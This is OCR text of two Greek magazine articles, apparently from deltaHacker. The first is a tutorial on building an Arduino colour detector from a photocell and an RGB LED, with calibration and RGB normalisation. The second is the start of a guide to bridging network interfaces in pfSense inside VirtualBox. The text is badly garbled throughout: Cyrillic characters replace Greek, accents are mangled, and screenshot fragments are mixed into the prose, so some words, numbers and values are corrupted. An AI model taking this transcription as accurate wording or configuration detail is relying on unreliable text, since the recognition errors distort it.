δεν αποτελούν κάποιον αισθητήρα ακρι- 
βείας που έχει περάσει апо δοκιμὲς ἠ/και 
κάποιου εἰδους "ρύθμιση" (calibration). 
Με алла λόγια, η *yevikn* συμπεριφορά 
των photocells εἶναι πάντοτε ἴδια, αλλά 
η απὀκρισή τους (οι Ἀσυγκεκριμένες3” 
Ta φωτοκύτταρα (photocells) εἶναι μεταβλητές HET Волес neg παρουσιάζουν ОЛИ“ МР 
αντιστάσεις που αλλάζουν την τιµή τους, ανάλογα στασἠ τους) παρουσιάζει αποκλίσεις. 
µε την ένταση του φωτός. Ακριβώς αυτό Το xapa- Μεταβάλλοντας το φως nou πέφτει πάνω 
κτηριστικὀ θα εκμεταλλευτούμε για να εντοπίζουµε σε δύο φωτοκύτταρα, θα παρατηρήσου- 
τα χρώματα διαφόρων αντικειμένων. ћ : : 

µε παρόμοιες μεταβολές στις аупота- 
σεις τους, алла οι тџес τους θα εἶναι ката паса πιθανότητα длафоретпкес! 


Πριν προχωρήσουμε, ENITPEWTE рас να πούμε δυο λόγια για το nog βλέπουμε εμείς”, 
οι άνθρωποι: Та μάτια µας περιλαμβάνουν χιλιάδες μικροσκοπικοὺς αισθητήρες, 
μερικοὶ апо τους οποίους αντιλαμβάνονται την ένταση του φωτὸς (τα λεγόμενα 
ραβδία) και κάποιοι ἄλλοι τη συχνότητά του — ἡ πιο απλά το χρώμα (τα λεγόμενα 
κωνία). AUTO που αντιλαμβανόμαστε σαν εικόνα, δηλαδἠ η πληροφορία σχετικἁ µε 
την ἐνταση алла και το χρώμα TOU φωτὸς στις διάφορες περιοχές, προκύπτει апо 
την αντανάκλαση του φωτὸς στα αντικείμενα. Κοιτώντας µια κὀκκινη μπάλα, βλὲ- 
πουμε τις ακτίνες φωτὸς nou *dEv* απορροφήθηκαν and τη μπάλα και οι οποίες 
ἐχουν τη συχνότητα που αντιλαμβανόμαστε ως κὀκκινο. Ας επιστρέψουµε τώρα 
στα φωτοκύτταρα. Τις περισσότερες φορὲς χρησιμοποιούνται σε аплес συσκευὲς, οι 
οποίες ενεργοποιούνται αυτόματα отам μειώνεται ο φωτισμός. Όπως KaTaAaBaive- 
τε, λοιπὸν, εἶναι κατασκευασμένα για να αντιδρούν στην ἴδια περιοχἠ του φάσματος 
της ηλεκτρομαγνητικἠὴς ακτινοβολἰας που αντιδρούν και τα μάτια µας: στο oparó 
φως. Στο като-като, θα ἦταν περἰεργο av то λαμπάκι νύχτας ἄναβε отам σβήναμε 
το WiFi ἡ τον φούρνο μικροκυμάτων, ETO! δεν εἶναι; :Ὁ Μάλιστα, η συμπεριφορά των 
photocells εξαρτάται τόσο апо την ἐνταση του Φωτός, OOO και апо τη συχνότητἁ 
του. Τελικά, η συμπεριφορά τους εἶναι παρόμοια µε εκείνη των ματιών µας. 


Όπως υποψιάζεστε, μπορούμε να χρησιμοποιήσουμε Eva photocell ox! µόνο για την 
ανίχνευση φωτός (γενικά), αλλά και για την ανίχνευση χρωμάτων. То µόνο που 
έχουμε να κάνουμε εἶναι να φωτίσουμε ἑνα αντικείµενο µε φως συγκεκριμένου Xpo- 
ματος και να μετρήσουμε την ένταση της αντανἀκλασής του. Αν το φωτοκύτταρο 
"δηλώσει" ότι η αντανάκλαση εἶναι ισχυρή, σηµαίνει ὁτι το φως δεν απορροφήθηκε 
κι ара το αντικείµενο ἐχει το χρώμα του φωτός που екпеџшаџе! Αν πραγµατοποιἠ- 
σουµε την ἴδια διαδικασία τρεις φορὲς, µε κὀκκινο, πράσινο και μπλε φως, τότε µε 
τη βοήθεια Tou photocell μπορούμε να εκτιμήσουμε TO ποσοστὀ TOU κὀκκινου, TOU 
πράσινου και TOU μπλε χρώματος, που ἐχει το αντικείµενο. To πιάσατε; Прауџато- 
ποιώντας ша μέτρηση µε καθένα апо αυτά τα χρώματα, μπορούμε να εκτιμήσουμε 
το χρώμα емос αντικειμένου λαμβάνοντας ша περιγραφἠ τύπου RGB. 


4. Αν εἰσαστε cyborg, συνεχίστε µε την επόμενη παράγραφο! 
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Ηναγνώριση χρωμάτων pe to Arduino 
LL 


Mia απλἠ κατασκευή που εντοπίζει τα χρώματα των аупкешемом nou Врі- 
σκονται μπροστὰ της. Κάτι τέτοιο θα κατασκευάσουμε κι εμείς... 


Συγκέντρωση υλικὼν 


Προφανώς το βασικότερο εξάρτημα εἶναι то φωτοκύτταρο, το οποίο μπορούμε εἰτε 
να αγοράσουμε eire να αφαιρέσουμε апо κάποια συσκευή (Eva φωτάκι νύχτας δω- 
ματίου, £va φωτάκι νύχτας κήπου к.а). Φυσικά, η καλύτερη λύση θα ἦταν να το 
αγοράσουμε, καθὼς ο πωλητὴς ενδέχεται να παρέχει κι Eva datasheet µε τα xa- 
рактпріотіка και, κυρίως, µε την απὀκριση του συγκεκριμένου photocell σε каде 
χρώμα. Ωστόσο, επειδἠ δεν απαιτούµε μεγάλη ακρίβεια, Eva οποιοδήποτε photocell 
θα εἶναι αρκετό yia την κατασκευἠ µας. Πριν πιάσουµε ro κατσαβίἰδι κι αρχίσουμε то 
ψάξιμο σε παλιές συσκευές, να σημειώσουμε ὁτι τα 20 photocells στοιχἰζουν μόλις 
0,94€ στο eBay. Το δικὀ µας θύμα ἦταν Eva φωτάκι κήπου — και δηλώνουμε ἐνοχοι 
για ὁ,τι του συνέβη :D 


Πα τον φωτισμό του εκάστοτε αντικει- Spectral Response 
μένου (πὠς αλλιώς θα μετρήσουμε την 

αντανάκλαση;) χρειαζόμαστε τρία LEDs: + 
ἑνα κὀκκινο, ἑνα πράσινο κι Eva μπλε. Н 

απλούστερη λύση, ὁμως, εἶναι να χρησι- 
μοποιήσουμε Eva RGB LED. Τέτοια LEDs 
έχουμε χρησιμοποιήσει και σε παλιότε- 
PEG κατασκευές, οπὀτε δεν θα χρειαστεὶἰ 
να катафџуоџџе σε κάποια αγορά. Па 650 750 850 
να προστατέψουμε то LED ба χρεια- Wavelength om 
OTOUHE και τρεις αντιστάσεις των 4700, i i 
av και θα μπορούσαμε va χρησιμοποιἠ- 
coupe οποιαδήποτε ἄλλη, παραπλήσια Ta φωτοκύτταρα αντιδρούν στην іда περιοχή του 
τιµή. Εμεὶς επιλέξαμε та 4700, επειδἠ ππλεκτρομαγνητικού φάσματος, όπου αντιδρά kai то 
διαθέταµε NON αυτὲς τις αντιστάσεις. ТЕ- ανθρώπινο μᾶτι, 


Relative response 
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λος, θα χρειαστούμε ша αντίσταση των 
10KQ. Αναρωτιέστε τι θα την κάνουμε; 
Πα την μέτρηση της αντίστασης του 
photocell θα φτιάξουμε vav μικρὸ διαι- 
ретп τάσης: Θα συνδέσουµε το photocell 
σε σειρἁ µε την αντίσταση, κι αυτό TO 
апло "δικτύωμα" θα συνδεθεί μεταξύ 5V 
και GND. Με τη βοήθεια του Arduino θα 
μετράμε την τάση που δίνει ο διαιρέτης 
κι апо αυτήν θα uno^oyiCouus την avri- 
σταση Tou photocell. 


Το μαγείρεμα 


Ξεκινάμε µε το κύκλωμα. Oi τρεις ακρο- 
δέκτες του RGB LED που ελέγχουν та 
επιµέρους χρώματα, συνδέονται μέσω 
μιας аупотаопс том 4700 µε та рп 9, 
10 και 11 Tou Arduino. О τέταρτος акро- 
δέκτης TOU RGB LED (ο λεγόμενος "ко!- 
мос") συνδέεται στο GND”. О ἑνας акро- 
δέκτης TOU φωτοκύτταρου συνδέεται 
στα +5V, Eva ο άλλος ακροδέκτης ouv- 
δέεται µε ro Analog ріп 0 rou Arduino 
και µε την αντίσταση των 10KQ. Τέλος, 
το ἄλλο акро της αντίστασης συνδέεται 
στο GND, ὠστε va σχηµατιστεἰ ο διαι- 


Μπορούμε να "δανειστούμε" Eva photocell 


ano éva Лаџпак! νύχτας rj καλύτερα ano ἑνα ρετης τασης που περιγραψαμµε νωριτερα. 
φως κήπου. Επιλέξαµε να πειράξουµε Eva φως у . | 

κήπου, γιατί μαζί µε rov αισθητήρα πήραμε και Το проураџџа στο Arduino (http://bit. 
άλλα εξαρτήματα, ὁπως επαναφορτιζὀµενες ly/dh@27colorpicker) ξεκινάει ρυθμίζο- 


ратара с Kal nMaxe AVEA η ντας τα αντίστοιχα pins σαν εξόδους, 


EVO ενεργοποιεί και τη σειραϊκή σύνδεση, µέσω της οποίας θα OTEAVE! το χρώμα nou 
εντοπίζει. О κυρίως κὠδικας праүратопогі αρχικά ша απλοϊκἠ αλλά χρήσιμη родш- 
ση (calibration): Εξετάζει τη συμπεριφορά του photocell που διαθέτουμε, μετρώντας 
τα акра των τιμῶν που παρέχει. AUTO επιτυγχάνεται µε ша μέτρηση ма το μαύρο 
και µε ша για πλήρη ένταση του φωτὸς. Μάλιστα, αυτό то сетак! μετρήσεων επανα- 
λαμβάνεται ша φορὰ ма το κὀκκινο, ша για το πράσινο και ша ма το µπλε χρώμα. 
Οι τιμές που προκύπτουν αποθηκεύονται σε πίνακες και χρησιμοποιούνται αργότερα 
για την κανονικοποίηση (normalization) των υπόλοιπων μετρήσεων. 


Όλη η μαγεία εντοπίζεται στη συνάρτηση checkColor. Εκεί, για каде χρώμα του RGB 
LED naipvovrai 5 διαφορετικἐς μετρήσεις, апо τις οποίες κρατάμε τον μέσο оро. Εδὠ 
χρειάζεται λίγη προσοχή: Αναρωτιέστε γιατὶ πραγματοποιούμε µια παύση του μισού 
δευτερολέπτου, αφότου ανάψουμµε το LED και μέχρι να πάρουμε τη μέτρηση; Ta 
φωτοκύτταρα παρουσιάζουν μεγάλο хромо απὀκρισης και, µε апла λόγια, η τιµή της 
αντἰστασἠς τους μεταβάλλεται µε αργό ρυθμό όταν αλλάζει η ἐνταση του φωτός. Πα 
να ολοκληρωθεί ο υπολογισμός каде επιµέρους χρώματος (κόκκινο, πράσινο, μπλε), 
5. Та περισσότερα RGB LEDs εἶναι τύπου СС rj Common Cathode. Έτσι, ο τέταρτος ακροδέκτης τους (ο κοινός) συνδέεται εσωτερικά στις 

καθόδους των τριών επιµέρους LED. Av το δικὀ σας RGB LED εἶναι τύπου CA (Common Anode) θα πρέπει ма συνδέσετε τον комо ακροδέκτη 


στα 5V. Βέβαια, αυτἠ η αλλαγἠ προὐποθέτει αλλαγές και στον κὠδικα που θα δούμε αργότερα. Για λόγους απλότητας, θα σας προτεΐναµε να 
πάρετε ἑνα RGB LED τύπου CC. 
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BEE =m 


αφαιρούμε апо το μέσο OPO των πέντε μετρήσεων την τιµή που μετρήσαμε ката TO 
calibration, στο πλῆρες σκοτάδι. Στη συνέχεια, διαιρούµε το αποτέλεσµα αυτής της 
πράξης µε τη διαφορὰ των δύο "ακραίων" τιμών για το αντίστοιχο χρώμα (τιµή σε 
πλήρη φωτισμὀ - τιµή στο σκοτάδι). Με αυτόν τον τρόπο επιτυγχάνεται η κανονικο- 
ποίηση nou αναφέραμε προηγουμένως. Ἔτσι, yia кадг χρώμα, λαμβάνουμε µια τιμή 
που βρίσκεται στο διάστηµα апо 0 Ewe 1. Кадеша апо аџтес τις τιμὲς πολλαπλασι- 
acetal µε το 255 και τελικά, για κάθε χρώμα παίρνουμε µια τιμὴ στο διάστηµα 0 ἑως 
255! Με ἀλλα λόγια παίρνουμε την περιγραφἠ του χρώματος σε RGB. 


Το µόνο που μένει εἶναι ма τυπώσουμε τα αποτελέσµατα και να προχωρήσουμε στην 
επόμενη ανἰχνευση! Νομίζουμε ὁτι η λογική του проураџџатос µας εἰναι αρκετά 
απλἠ. Ωστόσο, θα πρέπει va επιστήσουμε την προσοχἠ σας σε δύο μεγέθη που 
ενδεχομένως θα χρειαστεἰ να τροποποιήσετε, για να πάρετε τα καλύτερα δυνατά 
αποτελέσµατα. Πρῶτον, πόσες μετρήσεις θα πρέπει να παίρνουμε για καθένα апо 
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COMS So Π та τρία χρώματα; Н παράμετρος αυτή 
sod | Πιθανώς να µην παἰζει μεγάλο ρὀλο, αν 

= ^ A4] TO φωτοκύτταρο ανταποκρίνεται ἄμεσα 
nen στις аллаугс. Στις δικὲς µας δοκιμὲς, nà- 
B= 11 ντως, διαπιστώσαμε OTI οι NEVTE µετρή- 
cm σεις εἶναι аркетес, ενώ µε λιγότερες та 
pu ETT αποτελέσµατα των πειραμάτων δεν ἦταν 
=== ro Arduino yia διάφορα стадвера (δεν παρουσίαζαν επαναληψι- 
vw χρώματα... μότητα). Δεύτερον, πρέπει να ορίσουμε 
zo TO σωστὸ χρόνο αναμονής, апо τη στιγ- 
Е ur nou ανάβουµε ro LED μέχρι ма nå- 

[v] Autoscrol Noineendng | [56 | poupe τη џетрпоп. Αν έχουμε στα χέρια 


μας κάποιο datasheet θα πρέπει ма то 
συμβουλευτούμε, µιας και σίγουρα θα αναφέρει πόσο χρόνο апа!та! то photocell 
για να σταθεροποιηθεί στις νέες συνθήκες. Av OXI, ο μόνος τρόπος εἶναι οι δοκιμές! 


| ie ee E i 
m 
Wummumm 


E 


Hue: 128 Red: 111 
И бај: 169 Green: 207 
ColorSolid (um: 160 | — Вит /230 | 
А №" 


Ј 


Add to Custom Colors 


да μπορούσαμε να βρούμε ша μονόχρωμη карта αλλά µας αρέσουν та 
δύσκολα — хоргс να µας απασχολεί το ενδεχόμενο της αποτυχίας! Αυτή 
τη фора πάντως δεν αποτύχαμε :) О αισθητήρας εντόπισε то χρώμα 
επιτυχώς. Па να δούμε то χρώμα στον υπολογιστή, χρησιμοποιήσαμε то 
εργαλείο χρωμάτων του παλιού, καλού Paint των Windows. 
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Αποτίμηση 


Τα αποτελέσµατα εἶναι аркета εντυπωσιακά, ειδικἁ αν σκεφτούμε TO συνολικὀ KÒ- 
στος της κατασκευἠς. О αισθητήρας µας κατάφερε να εντοπίσει µε µεγάλη ακρίβεια 
πολλὰ και διαφορετικἁἀ χρώματα αντικειμένων. Προφανώς, µε vav εξειδικευμένο 
αισθητήρα, προ-ρυθµμισμένο απ' την κατασκευάστρια εταιρεία, θα паіруар πιο ακρι- 
Beic μετρήσεις. Ωστόσο, για τις περισσότερες δουλειὲς η κατασκευἠ µας προσφέρει 
IKAVONOINTIKEG τιμὲς. Ένα προβληματάκι που παρατηρήσαμε птам ori ο αισθητήρας 
επηρεαζόταν αρκετά апо το εἶδος των епфамг оу (апо το αν ἦταν γυαλιστερὲς ἡ 
ματ). Όταν μετρούσαμµε χρώματα πάνω σε харт! τα αποτελέσµατα ἦταν πολὺ кала, 
ενώ Tav δοκιμάζαμε σε уџамотера πλαστικά, γυαλιά ἡ μέταλλα, οι μετρήσεις ἦταν 
αλλοπρόσαλλες. Па την opa, πάντως, εἴμαστε αρκετά ευχαριστημένοι. Ελπίζουμε 
να ικανοποιηθεἰτε κι εσεὶς апо τα αποτελέσµατα και περιμένουμε να ακούσουμε та 
σχόλιἁ σας. Φυσικά, θα χαρούμε να μάθουμε και τις єфарџроүғс̧ που σκεφτἠήκατε για 
τον αισθητήρα χρωμάτων. 


cboa 8858668 
99 9090 ..... 


Το κύκλωμα στο Fritzing! Αρκετά απλὀ στη λογική του 
ка! µε ελάχιστα εξαρτήματα, που катӣ πάσα πιθανότητα 
διαθέτουν поп ὁσοι ασχολούνται µε τα ηλεκτρονικά. 
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Skill: Advanced 
Tags: pfSense, OpenBSD, bridging 


Bridging oto BSD 
yia routers κατηγορίας kick-ass! 
Μετά ro εισαγωγικὀ арӨро oro bridging, που αρχίζει ano τη σελίδα 40, εἶναι 


πλέον ора ма δούμε пос γεφυρώνουμµε network interfaces προκειµένου 
να φτιάχνουμε routers nou καλύπτουν боо то δυνατὸν καλύτερα τις 


ανάγκες µας. Αν δεν ἐχετε To hardware για ма παΐξετε, δεν υπάρχει κανένα 
πρόβλημα: Μπορεῖτε να ξεκινήσετε τους πειραματισμούς σας σε EIKOVIKO 
περιβάλλον — και σας δεΐχνουμε πώς. 


_ by subZrau 


μμ 


Bridging oto BSD, για routers κατηγορίας kick-ass! 
LL 


Σκοπεύετε λοιπὸν να φτιάξετε TOV δικὀ σας router yia το опт, yia το γραφείο, yia 
κάποιο εργαστἠριο στο σχολείο ἡ oro пеметотушо κ.ο.κ. Θέλουμε κατ' αρχάς va 
σας πούμε ότι ζηλεύουμε λίγο, αφού ακόµη κι αν γνωρίζετε ακριβώς πῶς θα κινηθεἰ- 
τε κα! τι θα κάνετε, θα το διασκεδάσετε OUTWC ἡ ἄλλως. Θα θέλαμε εξάλλου να uno- 
γραμμίσουμµε от: το bridging εἶναι πολὺ πιθανὀ ма σας γλυτώσει апо περιττὰ ἑξοδα ἡ/ 
και να σας βοηθήσει σε θέματα ασφάλειας κι επιδόσεων. Αν тора µας ρωτήσετε, για 
λειτουργικὀὸ σύστημα TOU router προτείνουμε να επιλέξετε μεταξύ των pfSense κι 
OpenBSD. Στο паром ἀρθρο, μάλιστα, δείχνουμε noc φτιάχνουμε bridges σε καθένα 
εξ αυτών των συστημάτων. 


Тора, апо τη στιγμή που συζητάμε για τον δικὀ µας, DIY router, να πούμε δυο λόγια 
και για To hardware. Μεταξύ των επιλογὠν που έχουμε υπάρχουν και λύσεις σαν 
αυτὲς που προσφέρει η Soekris. Δείτε για παράδειγµα τη σειρὰ net6501, στο http:// 
soekris.eu/shop/net6501 en. То καλὸ pe ro Soekris hardware εἶναι ότι συνεργάζεται 
άψογα pe то *BSD, φυσικἀ και ue ro Linux. Εἶναι επἰσης χαµηλἠς ενεργειακἠς KaTa- 
νάλωσης, емтелос aBOpuBO алла και "μαζεμένο", UNO την &vvoia ὁτι καταλαμβάνει 
λίγο χώρο. ‘Eva "μείον" του Soekris hardware εἶναι το κόστος του, το οποίο πιθανώς 
θα βρείτε тоџппџемо (еџејс τουλάχιστον αυτό σκεφτἠκαμε). Μιλάμε ὁμως για εξει- 
δικευμένες λύσεις και συγκριτικά ισχυρό hardware, επομένως εννοεῖται ότι οι τιμὲς 
да 'vai πάνω ano εκείνες των τυπικών, consumer grade συσκευών. 


Εναλλακτικά, ἴσως αποφασίσετε να μετατρέψετε σε router £vav σχετικἀ пало uno- 
λογιστή, ο οποίος φαίνεται παροπλισμένος αλλά στην πραγματικότητα ἔχει πολλὰ 
να προσφἑρει ακόμα. Αν βγεἰτε στην αγορά για µία ἡ περισσότερες κάρτες Ethernet 
—то box Χρειάζεται τουλάχιστον δύο-- προτιμήστε εκείνες της Intel, αφού υποστη- 
ρἰζονται ἄριστα ano το *BSD (και ναι, κι апо To Linux). Καλού κακού, πάντως, πριν 
την αγορά ρἰξτε ша καλἠ ματιά στη σχετικἠ λίστα µε το υποστηριζόμενο hardware 
— εννοείται ano πλευράς Tou OS που σκοπεύετε να χρησιμοποιήσετε. Τέλος, µια 
καλἠ ιδέα εἶναι ν' απαλλάξετε το box апо τον κλασικό, µαγνητικὀ του δίσκο και ма 
του χαρίσετε Evav μικρὸ SSD. Αυτομάτως то box θα γίνει πιο αθὀρυβο, θα κατανα- 
λὠνει λιγότερη ενέργεια, ενώ θα έχετε και χώρο yia να στήσετε ἑξτρα εφαρμογές, 
όπως, N.X., web proxy cache ἠ/και каполо intrusion detection system. 


Ac περάσουμε ὁμως στο θέμα µας, nou εἶναι To bridging. 


Bridging µε то pfSense 


To pfSense εἶναι το αγαπημένο λειτουργικὀ σύστημα OAWV εκείνων που θέλουν να 
δημιουργήσουν το δικὀ τους, πανίσχυρο router/firewall, στο οποίο μάλιστα θα uno- 
pouv να προσθέσουν κι гма σωρὀ δυνατότητες κι εφαρμογὲς όπως, n.x., transparent 
proxy, IDS κ.ο.κ. Па ша αναλυτικἠ παρουσίαση της εγκατάστασης, της ρύθμισης 
αλλά και της χρήσης Tou pfSense, προτείνουμε να παρακολουθήσετε то 7ο επεισόδιο 
της 1ης σεζὀν Tou deltaCast: 


http://deltahacker.gr/deltacast-s01e07 


Δουλεύοντας ropa σε Eva Virtualbox VM, το onoio διαθέτει τἐσσερις EIKOVIKOUG 
network adapters, θα δούμε noc φτιάχνουμε Eva bridge interface nou γεφυρώνει 
τους τρεις апо τους τέσσερις, δηλαδἠ αυτούς nou βλέπουν οι πελάτες του pfSense. 
О τέταρτος adapter εἶναι για τη σύνδεση WAN και θα μείνει εκτὸς bridge. Πριν npo- 
χωρήσουμε, οφείλουμε να δούμε καλύτερα τους adapters Tou VM µας. 
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Adapter 1. Εἶναι γεφυρωμένος апо ro Virtualbox µε τον aAn8ivó Ethernet adapter 
Tou host computer, ο οποίος εἶναι συνδεδεμένος емоџрџата µε том αληθινό (VDSL) 
router του τοπικού δικτύου. Πρόκειται για το WAN interface rou router και yia то 
λειτουργικὀ TOU σύστημα εἶναι то ето interface. 


Adapter 2. Εἶναι τύπου host-only, έχει τον ρὀλο του LAN interface yia Tov router, 
ενώ για TO λειτουργικὀ του σύστημα εἶναι To emi interface. Μέσω αυτού Tou adapter 
συνδεόµαστε στο web panel rou pfSense χρησιμοποιώντας κάποιον web browser, 
ο οποίος τρέχει eire oro host computer εἰτε σε Eva ano ra VMs *nioo* апо το 
pfSense — аркі βεβαίως να 'ναι συνδεδεμένα στο LAN interface Tou προαναφερθέ- 
ντος. Πρακτικὰ, για το εικονικὀ περιβάλλον στο onoio εργαζὀµαστε, auró σηµαίνει 
ότι та ММ-пелатес βγαϊνουν στον ἐξω κόσμο μέσω network adapter που εἶναι κι 
αυτὸς host-only — και μάλιστα ανἠκει στο ἴδιο host-only network опоџ ανήκει κι 
ο Adapter 2. Διαφορετικά: Αν то ὀνομα του host-only adapter που αντιστοιχεἰ στο 
LAN interface εἶναι το "VirtualBox Host-Only Ethernet Adapter #3" (βλ. στην κατη- 
yopia Network, στις ρυθμίσεις Tou pfSense VM), τότε yia να πούμε Ori Eva οποιοδἠ- 
ποτε VM εἶναι πελάτης του pfSense, αυτὸ πρέπει va βγαΐνει στον ἐξω κόσμο μέσω 
host-only adapter µε ὀνομα επἰσης To "VirtualBox Host-Only Ethernet Adapter #3". 
Παρατηρήστε και τις ρυθμίσεις δικτύωσης της εκάστοτε εικονικής μηχανῆς, και η 
περιγραφἠ που μόλις επιχειρήσαμε ξαφνικά θ' αποκτήσει νόημα :) 


Adapter 3 & Adapter 4. Εἶναι κι аџтој τύπου host-only, ανήκουν σε διαφορετι- 
ка host-only networks an' αυτό που ανήκει o Adapter 2, εξομοιώνουν άλλα δύο 
Ethernet ports του router, σε λίγο To pfSense θα τα ονομάζει OPT1 και OPT2, ενὼ 
για το λειτουργικὀ σύστημα εἶναι τα em2 καὶ em3 interfaces. Μετὰ την εγκατάσταση 
του pfSense δεν £youv IP — και μάλιστα δεν εἶναι καν емеруа. 


General Network 
System 


Display Adapter 1 | Adapter 2 | Adapter3 | Adapter 4 | 


Storage [7] Enable Network Adapter 

Audio Attached to: |Host-only Adapter v 

Name: 
Serial Ports V Advanced 

USB Adapter Type: Intel PRO/1000 MT Server (82545EM) 

Shared Folders 


E) Ὁ Ὁ 8 6 (2) ЕЈ [5 


MAC Address: |0800271E8A 15 
Cable Connected 


Port Forwarding | 


Προσοχἠ: Προκειμένου να φτιάξουμε Eva σωστό bridge σε περιβάλλον VirtualBox, ὁλοι о! 
network adapters που θα γεφυρωθούν θα πρέπει va 'vai σε Promiscuous Mode. 
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Δουλειά µας yia τη συνέχεια εἶναι va ενεργοποιἠσουµε τα ОРТ1, OPT2 και ма та y£- 
Φυρώσουμε pe ro LAN (η σειρἁ δεν έχει σημασία). Διαφορετικά: AUTO nou θα κάνου- 
µε εἶναι να φτιάξουμε Eva bridge group µε µέλη та OPT1, ОРТ2 και LAN. Βεβαίως, 
θα χρειαστεί va ρυθµίσουµε κατάλληλα Tov DHCP server και τον DNS forwarder, 
καθὼς και να προσθέσουμε μερικούς απαραϊτητους κανόνες ото pf firewall, WOTE 
να 'vai δυνατἠ η αυτόματη διευθυνσιοδὀτηση αλλά και η επικοινωνία των clients 
μεταξύ τους, καθώς και µε rov ἐξω κόσμο. Πρακτικά, αν εἰχαμε αληθινό hardware 
µε τέσσερα Ethernet ports, εξαιρώντας εκεἰνο που θα συνδεόταν στο modem, σε 
οποιοδήποτε ano τα ἄλλα συνδέαμε Eva μηχάνημα τότε αυτό θα ἐπαιρνε IP апо το 
ἰδιο subnet, θα έβλεπε άλλα џпхаупџата-пелатес και θα ἔβγαινε στο Internet. 


Δείχνουμε ακολούθως noc εργαζὀµαστε, αναλυτικά και βήμα προς βήμα, μέσα ano 
то web panel του pfSense. 


| Firefox * 
Q pfsense.parabing.net - Services: DHCP 5... 


Ф | & 1921681011:443/services dhcp.php 


Services: DHCP server о gui) 


IN — — ай 


|. Deny unknown clients 

If this is checked, only the dents defined below ка get HITE Fiala M TT ο ο TIE πο елисе“ 
152.168.1010 DHCP Server > LAN Kı απενεργοποιού- 
255.255.255.0 µε την аитдџатп διευθυνσιοδότητη για 
νη τους πελάτες που συνδέονται στο LAN 
interface: Απλά, φροντίζουμε ώστε va 
[192.168.101.100 0] 1921681011 εἶναι σποεπιλεγμένο ro Enable DHCP 

If you need additional pools of addresses inside of this sub’ Server оп LAN interface kai κάνουμε 
Eva κλικ στο Save, ото κάτω μέρος της 
σελίδας. 


By 2 В- Googie 


Status * Diagnostics 


Interfaces: Assign network ports 
И Interface Groups | wireless | vuats | [73333773073 


етю (08:00:27:е4:ее:3Ь) 


emi (08:00:27:1е:82:15) 


МАН 

LAN 

orn | Βήμα 2. Μεταβαίνουµε στο Interfaces 

ОРТ2 | > (assign). Εκεί, θα πρέπει va εἶναι opi- 
σμένα та WAN (ето) και LAN interfaces 

NC (em1). Με διαδοχικά κλικ στο [+] θα 
προστεθούν алла δύο, та ΟΡΤΙ (em2) 
а а А και OPT2 (em3), та οποία αντιστοιχούν 


στους host-only adapters 2 και 3 avri- 
στοιχα. 


ος 


МУ УУ 


Interfaces: OPT2 


General configuration 


[У] Enable Interface 


f S OPT2 


Enter a description (name) for the interface here. 


None v 


h Insert my local MAC address 
This field can be used to modify ("spoof") the MAC address of this interface 
(may be required with some cable connections) 

Enter a MAC address in the following format: хх:хх:хх:хх:хх:хх or leave blank 


If you leave this field blank, the adapter's default MTU will be used. This is typically 1500 bytes but can vary in some 
circumstances. 


If you enter a value in this field, then MSS damping for TCP connections to the value entered above minus 40 
(TCP/IP header size) will be in effect. 


- Show advanced option 


Private networks 


а eens Βήμα 3. Κάνουμε κλικ πάνω στο ΟΡΤΙ. 
When set, this option blocks traffic from 15 addresses tha Στη νέα σελίδα που εμφανίζεται TOE- 
Со, 172. 16/17, 102. 168/16) по αμα ο ο τος στ а ое 
7 κλικ στο Save και, στο ενηµερωτικὀ 
|. Block bogon networks r ͵ , η 
When set, this option blocks traffic from IP addresses the Πλαίσιο που εμφανίζεται στο πάνω μέρος 
IANA. Bogons are prefixes that should never appear int TC σελίδας, патаџе στο κουμπί Apply 
as the source address in any packets you receive. n А 
changes. Παρατηρήστε Оті στο IPv4 
Note: The update frequency con be changed under Syse асп аианооуре αφησαπε тани 
попе και, γενικἀ, δεν n&ipá&ape τίποτε. 


Aivoupe Interfaces > (assign) ki επανα- 


λαμβάνουμε για то OPT2. 


Й ervices » 


Interfaces: Bridge: Edit 


Bridge configuration 


Member interfaces LAN - 
ΟΡΤΙ 

OPT2 [ig 

Interfaces participating in the bridge. 


Βήμα 4. Аколоибоиџе τη διαδρομή 
Interfaces > (assign) > Bridges και 


- κάνουμε κλικ στο коиџпак! [+]. Από то 
Show advanced options ͵ B ͵ 
πλαίσιο Member interfaces επιλέγουμε 
εκείνα та network interfaces που 0a 


γεφυρωθούν. Πα то παράδειγμά µας, 
κρατάμε πατημένο το [CTRL]... 


у My 1st bfidge 
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rer 
| Firefox * 


Interfaces: Bridge 
interface assignments | interface Groups | wireless | viats | qnas | ppps [ cre | ст ЈЕ 


Note: 
Here you can configure bridging of interfaces. 


...Ki επιλέγουμε ra LAN, OPT1 και 
OPT2. Προαιρετικἀ, στο πλαίσιο 
Description γράφουμε κάτι περιγρα- 
фико, όπως, N.X., το апергурапта 
πρωτότυπο "My 1st bridge", kai па- 
τάμε στο Save. Βλέπουμε тора от! 
έχει δημιουργθεί Eva νέο interface 
µε óvoua BRIDGEO και µέλη ra LAN, 
OPT1 kai OPT3. Τέλεια. 


pfSense is © 2004 - 2013 by Electric Sheep Fencing LLC. All Rights Reserved. [view license] 


————— 
| Firefox * 


Interfaces: Assign network ports 
3 петог Groups | wireless | млн | dings | ер» | cne | ст | Bridges | лос | 


em2 (08:00:27:38:eb:49) w 


em3 (08:00:27:83:b5:ef) ~» 


BRIDGEO (Му 1st bridge) ~ 


Interfaces that are configured as members of а lagg(4) interface will not be shown. 
Βήμα 5. Πηγαίνουμε στην картела 
Interface assignments (αριστερό), 
κάνουμε κλικ στο [+] κι εμφανίζεται 
éva νέο interface, то ОРТЗ. Φροντί- 
ζουμε Qoare то Network port να εἶναι 
το BRIDGEO (για εμάς, αρχικἁ ἦταν 
το /2ἱρ0 (0)) κι επικυρώνουμε µε 
ΚΛΙΚ στο Save. 


pfSense is © 2004 - 2013 by Electric Sheep Fencing LLC. All Rights Reserved. [view license] 
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» Interfaces » Firewall ν » Diagnostics 


Interfaces: OPT3 202 


General configuration 


Enable (4 Enable Interface <m 


Description OPT3 
Enter a description (name) for the interface here. 


IPv4 Configuration ризи 
Static IPv4 v q 
Type 
IPv6 Configuration — EE 
None 


v 


- Ν Insert my local MAC address 


This field can be used to modify ("spoof") the MAC address of this interface 
(may be required with some cable connections) 
Enter a MAC address in the following format: xx:xx:xx:xx:xx:xx or leave blank 


If you leave this field blank, the adapter's default MTU will be used. This is typically 1500 bytes but can vary in some 
circumstances. 


If you enter a value in this field, then MSS damping for TCP connections to the value entered above minus 40 
(TCP/IP header size) will be in effect. 


a [X 192.168.80.1 Dn. = 


Gateway None ~ -or add a new опе. 
If this interface is an Internet connection, select an existing Gateway from the list or add one using the link above 


Private networks 


Block private networks 

